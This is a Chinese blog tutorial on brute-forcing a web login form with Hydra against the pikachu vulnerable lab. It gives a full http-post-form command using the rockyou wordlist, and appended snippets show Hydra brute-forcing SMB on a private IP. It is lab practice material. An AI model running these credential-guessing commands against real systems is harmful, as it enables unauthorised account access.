使用Hydra爆破表單

2021-09-07 15:38:07 字數 878 閱讀 6660

部落格位址

github

kali linux

web靶機(github傳送門)

靶機表單內容如下

表單截圖

假設網域名稱為host.com,表單路徑為/pikachu/vul/burteforce/bf_form.php

執行命令如下

hydra -l admin -p /root/rockyou.txt -s 80 -f host.com http-post-form "/pikachu/vul/burteforce/bf_form.php:username=^user^&password=^pass^&submit=login:username or password is not exists~"
其中/root/rockyou.txt為kali自帶的爆破字典,正常路徑位於/usr/share/wordlists/rockyou.txtusername or password is not exists~為表單錯誤提示,hydra以此判定是否爆破成功。

執行結果如下

不指定使用者名稱,使用使用者名稱字典/root/user.txt

爆破工具 Hydra 簡單使用

我用的是虛擬機器kali中自帶的hydra,hydra很強大,我們可以在github找到原始碼 我們可以使用命令檢視基本操作提示 hydra h引數 用途 l 指定單個使用者名稱,適合在知道使用者名稱爆破使用者名稱密碼時使用 l指定多個使用者名稱,引數值為儲存使用者名稱的檔案的路徑 建議為絕對路徑 ...

hydra 爆破445,22埠(筆記)

一。爆破445 smb 1.命令列 hydra 192.168.0.104 smb l administrator p root desktop 1.txt t 64 v 192.168.0.104是目標伺服器的ip位址 smb 是協議 l 大寫指定乙個帳號字典 小寫l指定使用者名稱 p 指定乙個密...

Hydra爆破mysql常見的兩個錯誤

error host 192.168.83.157 is not allowed to connect to this mysql server 這是因為沒有開啟msyql遠端服務。登入mysql mysql u root p 密碼 開啟mysql遠端訪問 use mysql update user...